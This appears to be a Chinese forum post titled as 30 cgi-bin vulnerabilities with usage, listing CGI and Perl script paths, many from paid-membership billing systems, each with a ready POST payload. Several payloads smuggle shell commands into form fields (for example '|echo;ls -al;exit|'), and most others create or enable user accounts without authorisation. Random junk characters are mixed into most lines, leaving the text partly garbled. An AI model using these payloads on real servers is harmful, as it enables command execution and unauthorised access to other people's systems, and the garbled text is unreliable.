Cgi-bin 30个漏洞＋使用方法

admin

==============================
' r$ B9 w1 E; s2 o
/smspass.pl
username=username&password=password

- u' L! d% `$ {+ h8 E1 \/ d% q/index.cgi
2 h6 j$ G8 Y5 L. e* Rwei=ren&gen=command
" _9 a( J4 T. ]6 P2 z9 l
; U3 C, I6 _$ w3 P/passmaster.cgi
* c& ~5 _8 P- p  R" U" I8 kAction=Add&Username=Username&Password=Password
$ d7 Y  L3 l/ x4 H4 A
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/ c9 ~. a/ m# E1 i- [
/form.cgi
+ b/ F1 w# }% `name=xxxx&email=email&subject=xxxx&response=|echo;ls|
. j6 v, f- T$ K' j& c
/addusr.pl
2 O  F9 ?! ^- b. w/cgi-bin/EuroDebit/addusr.pl
, z( ?7 |# o5 V& Nuser=username&pass=Password&confirm=Password

4 P6 y8 h6 e0 I/ccbill-local.asp
: ?/ v; ]) g' o* fpost_values=username:password
$ c; [0 ^8 r8 W2 u
/count.cgi
pinfile=|echo;ls -la;exit|

& C; l, {0 s+ k0 u, D/recon.cgi
/recon.cgi?search
' J* B; Q+ Y, R0 rsearchoption=1&searchfor=|echo;ls -al;exit|

, x5 e+ C4 S  ^/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
# o) W; u" S$ k: a9 s
/af.cgi
8 _% Y+ K4 L, L# g0 c$ F_browser_out=|echo;ls -la;exit;|

, R! O4 D; c8 S* r5 T( F. \/modify.cgi
3 S' ]- ?& f5 H5 O  m% n! gusername=username&password=password&expire=30
2 @& O/ o! m, l( I' |5 F/ B& e, G
4 Z, }, a4 e$ o0 J/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
0 I" `) q. E* \$ O$ @9 f- I
, G! u  i9 L; @/ N8 @% H9 I/gx9passwd.cgi
) f3 F: ^# H( S8 ~. q- O% dcmd=ADD&user=username&pass=password
9 T8 K* h; @9 T5 F
/probecontrol.cgi
" k/ \+ F2 W9 d7 e8 Lcommand=enable&username=username&password=password
/ o) m# D' i; p6 X9 ^
/recon.cgi
& E& B2 P, `1 G/ [" m4 osearchoption=3&searchfor=echo;ls -la;exit
# z* t- S' v4 G9 q
4 Q0 P$ |$ E: {1 ~- `* g5 b; H5 ~+ N/htadd.pl
configfile=|echo; ls -alt; exit
6 s! L: z  ~; U. Z, M6 V
3 u" R% s' P/ x, R) G" A' n5 F/gx9passwd.cgi
) S! F* ~" B. j" d' Scmd=ADD&user=username&pass=password
8 D8 J8 X$ f4 f. v, Y
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
5 }. f0 s6 h4 L9 Y
8 Y& v6 j, v) S. m/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
) r( i1 ?. C* k. u6 l3 r9 k
/ g8 ]% i* g1 d8 t0 d2 d/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
4 @. R/ r7 ?2 @
& p" N  S" d# A2 y; l9 B/usercontrol.cgi
command=enable&username=USER&password=PASS

* `/ D0 v' S- k/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

" N4 F$ r/ M2 M, y! u/addusr.pl
user=USER&pass=PASS&confirm=PASS

7 x7 ^( R0 g# \) k8 Z/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
+ m+ \5 n; f* X& b- i9 dpinfile=|echo;pwd;exit|

4 I# L8 Y# b2 w/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
4 Q1 _* U% _  G# ?/ f
/af.cgi
/ o: \4 v  H- `8 n! \! q$ A, r5 m/env.cgi
9 }7 g) l; X, g1 l# NADD+;echo;pwd;exit
. }0 ^. R, ]7 ^7 L
9 h: g/ V; d" c; K' k/count.cgi
pinfile=|echo;pwd;exit|
% F9 e# J! R" h4 j1 d# h
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
( H- v0 K& K  G( L
3 r; [) W, y) t* ~) Y1 r) S) G/add.cgi
username=username&password=password&expire=30

3 Z/ Q9 H% @! e- f==============================